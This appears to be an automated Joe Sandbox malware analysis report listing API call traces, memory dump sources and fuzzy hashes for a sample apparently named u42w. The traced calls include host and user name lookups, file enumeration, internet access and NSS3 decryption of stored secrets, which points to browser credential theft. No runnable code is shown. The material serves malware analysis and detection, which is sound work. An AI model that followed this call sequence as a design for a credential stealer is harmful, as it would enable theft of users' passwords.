                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3635112192-0
                                                                                                                                                                                                                              • Opcode ID: d0d12244e56377dad6549dc747312b04261d8f8a8838afc4123c2bb567b5df39
                                                                                                                                                                                                                              • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0d12244e56377dad6549dc747312b04261d8f8a8838afc4123c2bb567b5df39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                                                              • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                              • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                              • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F66690), ref: 00412AD8
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2699682494-0
                                                                                                                                                                                                                              • Opcode ID: db7ba532159b08be4b97e69067dd13966bc0bdbae1d3d5976b6b0117e0df4a87
                                                                                                                                                                                                                              • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db7ba532159b08be4b97e69067dd13966bc0bdbae1d3d5976b6b0117e0df4a87
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                              • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                              • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: fcd7212be9d9cc950af72ce96ac18942da04811e261a1c65db4c3aaed9ff6651
                                                                                                                                                                                                                              • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcd7212be9d9cc950af72ce96ac18942da04811e261a1c65db4c3aaed9ff6651
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                                                                              • Opcode ID: aab914ecba9bdd74f7952373867dd33bdee27b161c6f8cf2aefa04b203c20174
                                                                                                                                                                                                                              • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab914ecba9bdd74f7952373867dd33bdee27b161c6f8cf2aefa04b203c20174
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1004333139-0
                                                                                                                                                                                                                              • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                              • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                              • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                              • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00412314
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F61C20), ref: 00412339
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65A50), ref: 0041234C
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00412359
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0041236A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                                              • API String ID: 13328894-2848263008
                                                                                                                                                                                                                              • Opcode ID: 360cf5248b22f44b8429476b3986cf3458239551f0eb4c76a4fd81c8879d788d
                                                                                                                                                                                                                              • Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 360cf5248b22f44b8429476b3986cf3458239551f0eb4c76a4fd81c8879d788d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02F619E0), ref: 0040BFE1
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
                                                                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
                                                                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                              • PK11_FreeSlot.NSS3(?), ref: 0040C0D1
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3428224297-0
                                                                                                                                                                                                                              • Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                              • Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040DB1C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                              • String ID: [@$\*.*
                                                                                                                                                                                                                              • API String ID: 2325840235-1445036518
                                                                                                                                                                                                                              • Opcode ID: 72c2c17873a21f2babb8c24e101f72d36ce91ddf54f13b01004097bc75a73fd5
                                                                                                                                                                                                                              • Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c2c17873a21f2babb8c24e101f72d36ce91ddf54f13b01004097bc75a73fd5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C3F
                                                                                                                                                                                                                                • Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C60
                                                                                                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6C951C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C94
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
